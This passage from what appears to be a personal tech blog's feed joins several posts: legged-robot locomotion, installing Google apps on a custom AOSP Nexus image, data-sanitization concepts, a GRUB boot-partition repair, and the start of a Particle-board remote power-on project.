<p>One other thing which the average observer may have noticed is that the four legged robots performed significantly better than the two legged humanoid robots. To many the reasons why may seem obvious, but to others this outcome may not be so obvious. Even to those who easily made sense of this outcome, they probably have not realized how these results are consistent with the biological organisms which inhabit our planet. With that in mind, I'd like to take a moment to write about locomotion and how it relates to both robots and biological organisms alike.</p>
<h2>Locomotion in Biology</h2>
<p>Take a moment to recall every organism you can which moves over land using limbs. Now think about how many limbs each of these organisms have which are primarily used for moving. Now think about the number of limbs again, but this time pay special attention to the size of the organism relative to its number of limbs. Do this long enough, and a pattern should start to emerge. Specifically, smaller organisms like bugs tend to have six or more limbs while larger organisms like mammals have four and humans have only two. Once again, we're only considering the limbs used primarily for moving.</p>
<p>Is there something special about two limbs verses four limbs verses six limbs with regards to locomotion? As it turns out, there is. Specifically, the ability for the organism to remain stable while moving or while stationary changes as its number of limbs change.</p>
<h2>Physics of Stability</h2>
<p>But first, a bit of physics review. What does it mean for an organism which is standing on limbs to be stable or unstable? First, consider the limbs which are in contact with the ground. Now connect these limbs with imaginary lines to form an imaginary polygon on the ground beneath the organism. In order for an organism to be stable, its center of gravity must be somewhere within this polygon. If the center of gravity leaves this area, the organism will start to tip over and without corrective action, it will eventually topple over. So how does this relate back to having two, four, or six limbs?</p>
<h2>Six Limbed Organisms</h2>
<p>First, consider the six limbed bug. When the bug is stationary, it is standing on all six limbs and stable. How about when it wants to move? To move, the bug can pick up, for example, it's front right, back right, and middle left limbs. This leaves its front left, back left, and middle right limbs on still on the ground, forming a tripod. As long as the bug keeps its center of gravity near the center of its body, this is a stable position. This means the bug is now free to move its lifted limbs forward and place them down. Placing them down creates another tripod which, in turn, stabilizes the bug so it can lift up and move the limbs which were previously grounded. By using this "alternating tripod" locomotion, the bug can move while always being stable. In other words, if I had a magic wand which could freeze the bug, I could freeze the bug at any point during its locomotion and it would not fall over. So to summarize, with six limbs an organism can be stable while stationary or while in motion.</p>
<h2>Four Limbed Organisms</h2>
<p>How about the four limbed organism? When its stationary it has four limbs on the ground so again no problem with stability. But what about when it moves? Now there's a problem. With only four limbs, it cannot use the alternating tripod motion described earlier. It can still remain stable while in motion, but the motion would have to be very awkward. Specifically, the organism would have to shift its center of gravity to be within the right triangle formed by three of its limbs, move the now freed limb forward, and then shift its center of gravity over to the newly formed right triangle to free up another limb. This is possible, but now the organism is intentionally shifting its center of gravity as it moves which is something the six limbed organism didn't have to concern itself with. So to summarize, the four limbed organism is stable while stationary and potentially stable while moving, but requires a more complicated locomotion.</p>
<h2>Two Limbed Organisms</h2>
<p>Which leaves us with the two limbed organism. This organism isn't very stable while standing or moving. The problem is that two limbs only forms a line, not a polygon. So if each limb contacts the ground as only a single point, the organism will constantly be in a state of falling no matter where it shifts its center of gravity. To compensate for this, two limbed organisms have feet. Since the feet contact the ground at multiple points and not just one, the line now becomes a very narrow rectangle and stability can be achieved while standing. However, this rectangle is very narrow compared to the rectangles formed by the stationary four or six limbed organism. Consequently, if someone were to push each organism, the two limbed organism is much easier to knock over than the others. To state it more scientifically, while the four and six limbed organisms are in stable equilibrium when stationary, the two limbed organism is in unstable equilibrium. When disturbed by an outside force, the four and six limbed organisms tend to remain standing while the two limbed organism tends to start falling over.</p>
<p>Similarly to the four limbed organism, while it is possible for the two limbed organism to move without sacrificing stability, doing so results in a very awkward locomotion. The two limbed organism has to shift its center of gravity to be balanced on one foot so it can lift and move the other foot, and then its center of gravity has to be carefully shifted towards the newly placed foot, making sure that the center of gravity doesn't shift outside the narrow rectangle representing its stability. You can imagine how awkward and difficulty this would be.</p>
<h2>Complexity Verses Efficiency</h2>
<p>So if having less than six limbs makes it difficult for an organism in motion to remain stable, why do any organisms have less than six limbs? As it turns out, being unstable isn't always a bad thing. If an organism is always stable, it has to do all its own work in order to move itself. On the other hand, if an organism is unstable, it can take advantage of gravity to do some of the work of moving for it.</p>
<p>Consider once again the two limbed organism. Specifically, consider a human since that's the two limbed organism we're all most familiar with. Again, I'm only considering limbs used for locomotion. Our primary form of locomotion is called walking, but if you think about it, walking is really nothing more than controlled falling. To walk forward, a person lifts their foot, shifts their center of gravity forward, and then catches themselves with their lifted foot as they fall. The forward momentum from that fall then allows the person to lift their other foot and catch themselves as they fall forward again. After the first step, a portion of the forward energy is being generated by momentum as a result of gravity and this is a portion of energy which no longer needs to be generated by the organism. The result is a much more efficient locomotion than if the organism had to generate all the energy itself.</p>
<p>The same notion applies to running for two and four limbed organisms. Once the organism is running, the energy needed to continue running is simply the energy needed to lift itself a few inches off the ground and then to catch itself when gravity pulls it back down. While the organism is in the part of its stride where all of its limbs are off the ground, it is using no energy while still moving forward. To summarize, instability allows for greater efficiency.</p>
<h2>Conclusion</h2>
<p>The takeaway from all this is that when it comes to locomotion, the number of limbs a system has results in a trade off between complexity and efficiency. With more limbs, the system can be simpler because its more stable. On the other hand, with less limbs the system can be more efficient, but it also becomes more complex as it has to now be aware of its momentum and center of gravity. This could be an explanation as to why simpler organisms like bugs tend to have many limbs while more complex organisms like mammals tend to have fewer.</p>
<p>So what does all this have to do with the DARPA robotics challenge? What I hope I demonstrated with this rant on locomotion is that it shouldn't come as a surprise that the four limbed robots out performed the two limbed robots in this competition. For the engineers designing and building these robots, making a robot which is able to move on only two limbs adds a layer of complexity which the four limb robots don't have to worry about. However, as the field of robotics advances, two limbed robots will ultimately be superior to four limbed robots on land, especially as efficiency becomes the leading concern.</p>Installing Google Play Service and Google Apps on Nexus AOSP2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/play-service-on-aosp.html<p>I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0 …</p><p>I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0.2, but these steps should hopefully work for all Nexus devices and most Android version. This tutorial is broken up into 4 parts:</p>
<h2>Part 1: Compiling a Custom Image</h2>
<p>First, make sure you've downloaded the vendor drivers for your device: <a href="https://developers.google.com/android/nexus/drivers">link</a></p>
<p>Once you've downloaded the appropriate files, unzip them. You should now have a bunch of script files. Place these script files in the root directory of your AOSP repository and run them.</p>
<p>Next, make sure you've loaded your sources and you're in the correct lunch for your device (for Nexus 5, this is hammerhead aka 20):</p>
<div class="highlight"><pre><span></span><span class="nb">source</span> build/envsetup.sh
lunch <span class="m">20</span>
</pre></div>
<p>If this is your first time doing a make with the vendor drivers, you need to clobber to make sure the drivers are compiled into the ROM:</p>
<div class="highlight"><pre><span></span>make clobber
</pre></div>
<p>After that, make your ROM:</p>
<div class="highlight"><pre><span></span>make
</pre></div>
<h2>Part 2: Flashing Custom Image to a Nexus Device</h2>
<p>First, reboot your device into fastboot. The hardware button sequence for your device can be found here: <a href="https://source.android.com/source/building-devices.html">link</a></p>
<p>Once in fastboot, ensure that your bootloader is unlocked. You can lookup how to do this online.</p>
<p>After that, check that your computer can detect your device. You should see it when you run the following command:</p>
<div class="highlight"><pre><span></span>fastboot devices
</pre></div>
<p>If you can't see it, check your USB drivers and make sure you have Google's Nexus USB drivers if you're using a Nexus device.</p>
<p>Finally, flash the device:</p>
<div class="highlight"><pre><span></span>fastboot -w flashall
</pre></div>
<h2>Part 3: Flashing Recovery</h2>
<p>At this point, you've compiled a custom image and flashed it to your device. The next goal is to install the standard Google apps (GPS, Google Play, Gmail, etc.). Unfortunately, the default recovery doesn't work well with rooted devices. So before we can do that, we need to install a 3rd-party recovery.</p>
<p>First, reboot the device into fastboot. This can be done via adb:</p>
<div class="highlight"><pre><span></span>adb reboot bootloader
</pre></div>
<p>Once in fastboot, we can flash the recovery partition with our custom recovery. I recommend twrp which can be found here: <a href="https://twrp.me/Devices/">link</a></p>
<p>For Nexus 5, this version of twrp will work: <a href="https://dl.twrp.me/hammerhead/twrp-2.8.7.1-hammerhead.img.html">link</a></p>
<div class="highlight"><pre><span></span>fastboot flash recovery twrp-2.8.7.1-hammerhead.img
</pre></div>
<p>After that, reboot the device:</p>
<div class="highlight"><pre><span></span>fastboot reboot
</pre></div>
<h2>Part 4: Install Gapps</h2>
<p>First, push a gapps archive onto your sd card. This can be downloaded from cyanogen's website: <a href="https://web.archive.org/web/20161224215109/https://wiki.cyanogenmod.org/w/Google_Apps">link</a></p>
<p>The website only shows which gapps corresponds to which cyanogenmod version and not the equivalent AOSP version. From my experiences, I believe this much to be true:</p>
<ul>
<li>Android 5.1.0 &lt;=&gt; CM 12.1</li>
<li>Android 5.0.0, 5.0.1, 5.0.2 &lt;=&gt; CM 12</li>
</ul>
<p>If you are using a different version of AOSP, you'll have to experiment and find the right version on your own. Note, you can always do a factory reset from recovery to remove gapps and then install another version.</p>
<p>Once you've downloaded a version of gapps, push it to the sd card:</p>
<div class="highlight"><pre><span></span>adb push gapps.zip /sdcard/
</pre></div>
<p>Once the zip is written to the sd card, reboot into recovery:</p>
<div class="highlight"><pre><span></span>adb reboot recovery
</pre></div>
<p>Once in the Recovery, select install from zip and select your zip. After the installation is complete, select the wipe button at the bottom of the screen and then reboot the device. If everything worked correctly, you should be prompted with the Welcome screen which will ask you to configure your device. If you do not get the Welcome screen, then you either didn't install the correct version of gapps or you forgot to wipe something.</p>Digital Verses Analog Sanitization2015-10-28T22:30:00-04:002015-10-28T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-28:/water-buckets.html<p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping …</p><p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping for the other follow-up I promised regarding a more practical guide to data protection, this is not that post. This is going to be another conceptual writing.</p>
<h2>The Analogy</h2>
<p>The analogy which I'm going to use to try to illustrate the difference between digital and analog sanitization might seem somewhat contrived, but it's the simplest one I could come up with so here it goes.</p>
<p>Imagine you have a collection of buckets which can each hold 4 cups of water. You are able to add and remove water from the buckets whenever you like, however, you must always try to add or remove 3 cups worth of water at a time. So if a bucket is empty and you add water to it, the bucket ends up with 3 cups worth of water in it. If you try to add water again to the same bucket, some water overflows and is lost so ultimately the bucket ends up with 4 cups worth of water in it. Similarly, if the bucket only has 1 cup of water in it and you try to remove water, you end up removing all the remaining water in the bucket.</p>
<p>Now here's the last piece regarding how this analogy works. Assume that we only care about answering the question of if a particular bucket is more full or more empty. Therefore, if the bucket contains more than 2 cups of water, we will call it mostly full. Likewise, if it has less than 2 cups of water, we will consider it mostly empty. We don't have to worry about any bucket having exactly 2 cups of water in it given how this model is works. In fact, it is only possible for any particular bucket to contain 0, 1, 3, or 4 cups of water; assuming all the buckets start empty.</p>
<h2>Emptying the Buckets</h2>
<p>So we have our buckets and some time has gone by and now all of our buckets contain different amounts of water. Some are mostly full while others are mostly empty. Now lets assume that we want to "wipe" all of our buckets. In other words, we want all our buckets to be mostly empty. The process is pretty easy, we can just go to every bucket and remove water from it. Simple, right?</p>
<p>While it is true that doing this will now cause all of our buckets to be mostly empty, take another look at how much water is actually in each bucket. The buckets which originally had 3 or less cups of water will now be empty, but the buckets which originally had 4 cups of water will still have 1 cup of water remaining. This means that if we inspect how much water is in each bucket, we can determine which ones previously held 4 cups of water. We can reconstruct a portion of the past state of the buckets from the current state of the buckets!</p>
<h2>What Went Wrong?</h2>
<p>In a nutshell, the reason why we were able to figure out the past state of some of the buckets is because there is a correlation between the last state the bucket was in and its current state. This correlation occurred because when we emptied the buckets, we only consider the 2 possible digital states for a particular bucket and ignored the 4 possible analog states. If we had considered the analog states, we would have realized that we needed to empty each bucket twice in order to make it impossible to determine any bucket's previous state. This is an analogy of the difference between digital and analog sanitization.</p>
<h2>Back to Reality</h2>
<p>Although our simple analogy used buckets of water, this concept actually applies to electronic storage devices. For those of us with experience in the logical side of computing, such as any computer scientist who might happen to read this, we have a tendency to abstract away the gritty details about how the underlining hardware of a computer works. While utilizing this layer of abstraction simplifies our problems and makes them approachable, abstractions such as these can cause us to forget that our idealistic binary zeros and ones are actually being stored in physical materials. As every electrical engineer knows, these physical materials don't behave in accordance to our perfectly abstracted models. Instead, we have to take their infinite possible analog states and group them into the "zero" set and the "one" set in order to fit them to our models. Never forget, however, that at the end of the day the storage device is indeed physical and consequently analog. Correlations between states can exist, but become hidden underneath the veil of our abstractions.</p>
<p>So to end on a slightly more piratical note, how do professionals deal with these analog correlations? What is the takeaway from all this? The short answer is that if you want to wipe an electronic storage device, but you can't simply destroy it, don't settle with "zeroing" out the data over 1 pass. Overwrite all the data with random values and do so multiple times. The more passes and the more entropy, the less likely it is that a correlation will remain between the original data and the current state of the device. How many passes is necessary depends on the particulars of the device, so if you need to wipe a computer, smart-phone, or other electronic device, I recommend doing some research and selecting a professional tool to do the work for you. DBAN, for example, is a good one to consider.</p>Is your data really gone? Explaining the challenges of data wiping.2015-10-24T22:30:00-04:002015-10-24T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-24:/data-sanitization.html<p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the …</p><p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the hard drives of old discarded computers.</p>
<p>How does this happen? How is it that data turns out to still be on the device even when the user consciously takes actions to delete it?</p>
<p>In this article, I'm going to be covering a conceptual topic which forms one of the corner stones of a field known as <em>digital forensics</em>. Namely, what does it mean for data on an electronic device to be deleted and what does it take to restore this supposedly destroyed information?</p>
<h2>Terminology</h2>
<p>The first step to grasping what it means for data to be deleted is to understand that "deletion" can have multiple technical meanings which vary from the definition we use in everyday speech. Basically, there are different extents to which data can be deleted on an electronic device and based on what extent to which we delete the data, recovering it will entail a varying level of difficulty.</p>
<p>Many publications already categorize the degrees of data sanitization. For example, <a href="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf">NIST 800-88</a> (see Table 5.1) offers very generalized definitions of what the degrees of data sanitization are. However, since I want this article to be approachable to the laymen, I'm going to use an alternative categorization used in many <a href="https://www.usenix.org/legacy/event/fast11/tech/full_papers/Wei.pdf">publications</a>. If you're curious about how these two categorizations relate, the categorization I'm going to be using in this article fits into the <em>Clear</em> and <em>Purge</em> categories of NIST 800-88. Namely, I'm going to cover <em>logical sanitization</em>, <em>cryptographical sanitization</em>, <em>digital sanitization</em>, and <em>analog sanitization</em>. </p>
<h2>Logical Sanitization</h2>
<p>Logical sanitization is the weakest form of sanitization and the easiest to explain, so I'll cover it first using an analogy:</p>
<p>Imagine a particular file on your electronic device as being a house. In order to visit the house, you have to know how to get there. Luckily, the streets have signs at every intersection. By following the signs, you're able to find the house.</p>
<p>Now imagine that I take down all the signs. The house still exists, but now if you want to visit it, you'll have to search every street. This is what it means to logically sanitize data.</p>
<p>You can probably already see the shortcoming of this form of sanitization. Just because I take down the signs pointing to a piece of data doesn't mean that someone can't still find that data with enough effort.</p>
<p>Despite this fault, this is what actually happens in your electronic device when you normally delete your file. Your device doesn't actually delete the file itself, it just deletes its pointers to that file. This means that until a new file is written into the space the old file occupied, the old file can still be recovered. And since storage these days is large and most systems write new data randomly across the storage, that old file can remain there for a very long time.</p>
<p>So why do electronic devices delete data this way? Frankly, because it's the fastest method. Most users are more concern about speed rather than security, so system developers design their systems to delete data in the fastest way possible.</p>
<h2>Cryptographical Sanitization</h2>
<p>Cryptographical sanitization is an alternative version of logical sanitization which offers a bit more protection against data recovery.</p>
<p>To explain the difference, consider the house analogy again, only this time, the house also has a gated wall surrounding it. Luckily, you have a piece of paper in your hand which contains the password to open the gate. Thanks to this paper, you're able to visit the house without problem.</p>
<p>Now if I want to prevent you from visiting the house, I don't need to take down all the street signs, I just need to destroy your piece of paper which contains the password to the gate. Destroying this piece of paper is analogous to cryptographical sanitization.</p>
<p>However, this too has its shortcomings. For example, what if you memorized the password or otherwise made a copy of the paper? Alternatively, what if the password is so short that you could simply guess it? These are two serious challenges for cryptographical sanitization.</p>
<p>Additionally, cryptographical sanitization is weakened by the fact that it is circular. For example, what if I destroyed the paper containing the password by logically sanitizing it? You could just recover the paper, as mentioned in the previous section, and then access the house. In other words, cryptographical sanitization is only as strong as the sanitization applied to the password. If we apply cryptographical sanitization to that as well, then as the philosophers would say, it's turtles all the way down.</p>
<h2>Digital Sanitization</h2>
<p>Now we reach the stronger techniques for sanitizing data. Both of the two remaining techniques resort to destroying the house, but differentiating between the two can be difficult for the non-technical reader. For this reason, I'm going to keep my explanation brief and stick to the house analogy I've been using up to this point, even though doing so will introduce some vagueness. If you're interested in really understanding the difference between digital and analog sanitization, I plan to write a later article dedicated to this distinction using a different analogy better suited to the task.</p>
<p>Continuing along with the house analogy, digital sanitization is comparable to me taking a bulldozer, leveling the house, and then throwing the pieces into a dumpster and taking that dumpster with me. Now you cannot visit the house because the house simply doesn't exist.</p>
<p>Or can you?</p>
<p>As it turns out, there is still information about the house left behind! For example, you might study the depression in the ground left behind after the house was removed. Based on its size and depth, you might be able to approximate the house's dimensions; even though the house no longer exists. In fact, and this is where the house analogy breaks down, if you know enough about the construction of houses similar to the one that was destroyed, it is actually possible to reconstruct a perfect copy of the original house!</p>
<h2>Analog Sanitization</h2>
<p>Finally, at least in the scope of this article, we get to analog sanitization. As you've probably anticipated by now, this is the strongest of the four sanitization techniques covered in this article. Using the house analogy, this would be comparable to me not only destroying the house, but then also digging up the dirt on the property and replacing it with new dirt and leveling it. Now there are no remaining indicators that a house ever existed at any time in that spot, so there is nothing left to be used to try to reconstruct a replica house from. The data is truly gone at this point, so long as I have indeed destroyed every trace of the original house and its impact it had on its environment. That's a pretty big conditional claim I just made, but I'll leave it at that.</p>
<h2>Afterword</h2>
<p>This article ended up becoming more conceptual than I originally intended, but I hope the analogy was able to make the concepts I covered approachable. As mentioned, I hope to at some point write a follow-up article using another analogy which can better explain the difference between digital and analog sanitization. I also hope to in the future write an article to serve as the practical counterpart to this article for those who would like to know more about how to securely delete the data from their electronic devices.</p>The importance of boot partitions in Linux systems.2015-10-20T22:30:00-04:002015-10-20T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-20:/boot-partition.html<p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups …</p><p>Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups) to run a bunch of services and hosted lots of data (with no backups) for many users. Typical sysop problem (lol), but our lab has no personnel for managing the systems; so there I was.</p>
<p>In the process of finding and fixing the issue, I learned a lot of specifics regarding how the Grub bootloader and Linux work during system boot, so I decided to document my experience for future reference by others. This documentation will be lengthy, so if you only care about avoiding this type of problem, skip ahead to the Remediation section.</p>
<h2>Finding the Problem</h2>
<p>The server in question was a Dell Poweredge T620 running Ubuntu. The server consisted of two Intel Xeon processors, about 128GB of RAM, and three 2TB hard drives connected to a RAID controller.</p>
<p>The problem occurred during system start-up. The BIOS would start Grub, and then Grub would produce the error <code>error: attempt to read or write outside of disk hd0</code>. After that, the Linux kernel would start, but shortly after would spit out a stack trace and crash.</p>
<p>My first response was to run a disk check on the hard drives to make sure there weren't any problems with their sectors, but this turned up nothing. The disks were operating normally. This meant that the problem was most likely related to Grub.</p>
<h2>Diagnosing the Problem</h2>
<p>Since the error message that was appearing was being generated by Grub, the next thing I did was try to manually start the Linux kernel. The easiest way to do this is to press 'c' when the Grub menu appears. This will start a Grub command shell through which operating systems can be manually booted.</p>
<h3>Understanding Partitions</h3>
<p>Before explaining the commands I used while in the Grub command shell, I'll summarize some basics regarding partitions here.</p>
<p>First, hard drives and their partitions can be accessed in Linux via the "/dev" directory. In most modern Linux systems, hard drives follow a naming convention which starts with "sd" followed by a letter designating the drive. "sda", "sdb", "sdc", etc. Partition names are prefixed with a hard drive name followed by a digit designation. The hard drive "sda", for example, might have the partitions "sda1", "sda2", and so forth in the "/dev" directory.</p>
<p>Grub also uses the notion of disks and partitions, but the naming syntax is a little different. The syntax takes the form of "hd#,#" where the first # represents the disk number and the second # represents the partition on that disk. So "hd0,1", "hd0,2", and so on.</p>
<h3>Boot Sequence</h3>
<p>While I'm covering general Linux background knowledge, I'll also mention a portion of the boot sequence for Linux because this will also be important for understanding the Grub commands. In most Linux systems which boot using the BIOS (as opposed to newer EFI or UEFI booting) the critical pieces are: BIOS, Grub, initrd, and vmlinux.</p>
<p>BIOS stands for Basic Input Output System and is the first thing the system executes upon receiving power. Once the BIOS is started, it'll perform some basic system checks and then load and execute the bootloader. There are many bootloaders out there, but Linux systems tend to use a particular one called Grub. Grub's job is to load the pieces into memory that are necessary to start the operating system. In the case of Linux, the two important pieces which Grub needs to write into memory are initrd and vmlinux. I won't discuss these files in great detail, but to explain them briefly, initrd is the initial RAM disk for the Linux operating system. What that means is that initrd contains a minimalistic copy of Linux comprising of only the kernel and essential programs. Grub will load it into memory and then execute it and it will start up the full Linux kernel contained in the vmlinux file. Once the full Linux kernel is booted, initrd will unload itself from memory.</p>
<h3>Diagnosing Grub</h3>
<p>Now that I've covered all the necessary background information, on to the Grub commands.</p>
<p>The first step is to find where the boot directory is on the system. First, list all the partitions on the system:</p>
<div class="highlight"><pre><span></span>grub&gt; ls
</pre></div>
<p>This will create a list of all the partitions on the system. The next step is to figure out which one contains Grub, initrd, and vmlinux (since we're trying to boot a Linux operating system). This can also be done with the list command:</p>
<div class="highlight"><pre><span></span>grub&gt; ls (hd0,1)
grub&gt; ls (hd0,1)/boot
</pre></div>
<p>Once we've found the location of the boot files, set that partition as Grub's root directory:</p>
<div class="highlight"><pre><span></span>grub&gt; set root=(hd0,1)
</pre></div>
<p>I used "hd0,1" in the above commands, but you might find the boot files in a different partition. Either way, the boot files for a Linux system should always be either in the root directory of the partition (if that partition is a standalone boot partition) or in "/boot" (if that partition also holds other files).</p>
<p>After we've found the correct root partition, we next need to give Grub the names of the vmlinux and initrd files:</p>
<div class="highlight"><pre><span></span>grub&gt; /boot/vmlinux root=/dev/sda1
grub&gt; initrd /boot/initrd
</pre></div>
<p>Note, the vmlinux command needs to be passed the parameter "root". This parameter should be the partition which holds the Linux operating system. This may or may not be the same partition holding the boot files.</p>
<p>Once all the files have been specified, all that's left is to boot the operating system:</p>
<div class="highlight"><pre><span></span>grub&gt; boot
</pre></div>
<p>At this point, you'll get a basic command shell for Linux. Of course, our lab's server was failing to boot, so this didn't happen. Instead, the error mentioned at the beginning appeared when I tried to execute the initrd command. Because of this, I now know that initrd is the problematic file. So how do we fix this?</p>
<h2>Remediation</h2>
<p>So what went wrong? Basically, the problem is with the partitions on the server's hard drives. For some reason, when Grub tries to load the initrd file into memory, it reaches the end of what it can read from the hard drive before reaching the end of the file. In our case, the problem is that our RAID controller makes the hard drives appear as a single 4TB drive. This is quite large and the initrd file could reside anywhere in those 4TBs. As it turns out, Grub could not address the memory location of our initrd file and therefore couldn't load it. So the power outage was not the direct cause of our problem. At some point, most likely during an Ubuntu update, the initrd file was modified and ended up in a location on the logical hard drive which Grub can't reach.</p>
<p>The solution to this problem is to keep the boot files to a small partition which resides at the start of the hard drive. For those readers who skipped straight to this section, that's all you need to know. When you install a Linux system, you really should make a dedicated 256MB partition for holding the boot files, despite the fact that most Linux installers do not require you to do this.</p>
<p>In my case, however, I couldn't just reinstall the operating system, so in the following paragraphs I'll describe how I migrated the boot files in my already existing Linux installation into a new dedicated boot partition.</p>
<h2>Creating a Boot Partition in an Existing Linux Installation</h2>
<p>I started by flashing a copy of Ubuntu to a flash drive and booting it. There are plenty of tutorials on the internet about how to boot Ubuntu from a flash drive, so I'll forgo those instructions here.</p>
<p>The first thing I did was use gparted to create a new partition which will serve as our dedicated boot partition. Since the hard drive is already formatted, doing this requires shrinking the main partition and shifting it 256MB over. This frees up space at the start of the hard drive which can then be formatted into the new dedicated boot partition. If you've never used gparted before, I recommend using the GUI version since it's pretty intuitive. The new partition can be formatted to "ext4" and needs to have the "boot" flag enabled. Completing the shift will take awhile, so you'll probably want to do this overnight.</p>
<p>Once the new partition has been created, we next need to copy the existing "/boot" directory's contents over to the new partition. This can be done by mounting the two partitions while still in the Ubuntu Live USB. In the following commands, sda2 is my main partition and sda4 is the new boot partition:</p>
<div class="highlight"><pre><span></span>sudo -s
mkdir /mnt/sda2
mkdir /mnt/sda4
mount /dev/sda2 /mnt/sda2
mount /dev/sda4 /mnt/sda4
cp -R /mnt/sda2/boot/* /mnt/sda4/
rm -rf /mnt/sda2/boot/
mkdir /mnt/sda2/boot
umount /mnt/sda2
umount /mnt/sda4
</pre></div>
<p>Finally, Linux and Grub need to be reconfigured so they know that the "/boot" directory is now in a separate partition. This can be done manually by modifying Grub's "grub.cfg" file and Linux's "/etc/fstab" file, but for simplicity, you can use <a href="https://help.ubuntu.com/community/Boot-Repair">Boot Repair</a>. If you choose to go the Boot Repair route, make sure to switch the GUI into advance mode and go through all the options. Specifically, you need to make sure the "boot partition" option is set to your new boot partition and the "main operating system"" option is set to your main partition. Also, make sure the "set boot flag" option is pointed at your new boot partition and you can save a lot of time by disabling the "check filesystem for errors" option. If you instead decide to go the manual route, you'll need to manually edit "grub.cfg" looking for every "hd" reference and changing it to point at the correct partitions and the fstab file will need an additional entry to mount your new partition at start-up to the "/boot" directory.</p>
<p>If you do everything correctly, this should fix your Linux system and prevent similar issues from arising in the future.</p>
<h2>Conclusion</h2>
<p>Even though modern Linux installers do not require you to create a separate partition for the boot files, I recommend doing it anyway, especially if you have large hard drives. Otherwise, you might run into the problem I did.</p>Using internet of things to turn on a computer.2015-09-18T11:16:00-04:002015-09-18T11:16:00-04:00Carter Yagemanntag:carteryagemann.com,2015-09-18:/desktop-remote-switch.html<p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn on and off a computer from anywhere over the internet.</p>
<p>This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.</p>
<h2>The …</h2><p><center>
<img alt="particle wired to motherboard" src="https://carteryagemann.com/images/desktop-interals.jpg">
</center></p>
<p>Here's a fun and quick but practical hack using a small <a href="https://www.particle.io/">Particle</a> board to turn on and off a computer from anywhere over the internet.</p>
<p>This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.</p>
<h2>The Scenario</h2>
<p>I have a computer in my apartment which I mostly use for playing video games, but sometimes I like to access it remotely over the internet to do server tasks for me. The problem though is that gaming desktops use a lot of <a href="http://hardware.slashdot.org/story/15/09/01/1318231/">electricity</a> when they're running. So running the computer 24/7 would be too wasteful.</p>
<p>Instead, I want to be able to turn on my computer from anywhere on the internet; whenever I desire to use it remotely.</p>
<p>This can be achieved using "wake-on-LAN" (<a href="https://en.wikipedia.org/wiki/Wake-on-LAN">WoL</a>), but unfortunately my desktop's motherboard is too old to support this. So instead, I decided to connect a <a href="https://store.particle.io/">Particle Core</a> to my desktop's motherboard so it can turn on the computer for me!</p>
<h2>Particle</h2>
<p><img alt="particle" src="https://carteryagemann.com/images/particle-core.jpg"></p>
<p>For this hack, I used a Particle Core because that's what I had laying around, but a Photon would work just as well and is only $19. For the sake of brevity, I'm going to skip the details of how to setup and configure your Particle device. If this is your first time using Particle, they have a tutorial <a href="https://docs.particle.io/guide/getting-started/start/core/#getting-to-know-you">here</a>.</p>
<h2>ATX Motherboards</h2>
<p>My motherboard is an ATX, but the process should be similar for other common motherboard specifications.</p>
<p>So how does pushing the power button turn on your computer? Your motherboard has two pins on it which are used to turn on the computer:</p>
<p><img alt="pin diagram" src="https://carteryagemann.com/images/pin-diagram.jpg"></p>
<p>One of the two pins (labled Power Switch in the above diagram) holds a 3.3V to 5V charge and the other pin is ground. When you press the power button, the circuit is completed, allowing the charged pin to discharge into the ground pin. This drop in voltage is detected by the motherboard which serves as the signal that it's time to power up.</p>
<p>For our project, we're going to do the same thing, only instead of using a button, we're going to use a Particle.</p>
<h2>Wiring the Particle</h2>
<p>The circuit is pretty simple and with the right supplies you won't even need to solder anything! Once you've identified which pins on your motherboard are for the power, you can use the simple diagram below to wire everything up. All we're going to do is run a wire from one of the digital pins on the Particle to one of the power pins and then another wire from the Particle's ground to the other pin. I also added a small 220 ohm resistor to the ground wire just to make sure the Particle doesn't get fried.</p>
<p><img alt="schematic" src="https://carteryagemann.com/images/schematic.jpg">
<img alt="particle wired to motherboard labeled" src="https://carteryagemann.com/images/desktop-interals-labled.jpg"></p>
<h2>Software</h2>
<p>One of the nice things about Particle's boards is that they all communicate with Particle's cloud. This allows us to write our code through Particle's web interface and then the cloud can remotely flash the Particle. No need to open the case!</p>
<p>The following is the source code for our Particle:</p>
<div class="highlight"><pre><span></span><span class="cm">/**</span>
<span class="cm"> * Mobo Power - Copyright 2015 Carter Yagemann</span>
<span class="cm"> * </span>
<span class="cm"> * This program allows a core to power on a motherboard over the internet!</span>
<span class="cm"> * </span>
<span class="cm"> * This program is free software: you can redistribute it and/or modify</span>
<span class="cm"> * it under the terms of the GNU General Public License as published by</span>
<span class="cm"> * the Free Software Foundation, either version 3 of the License, or</span>
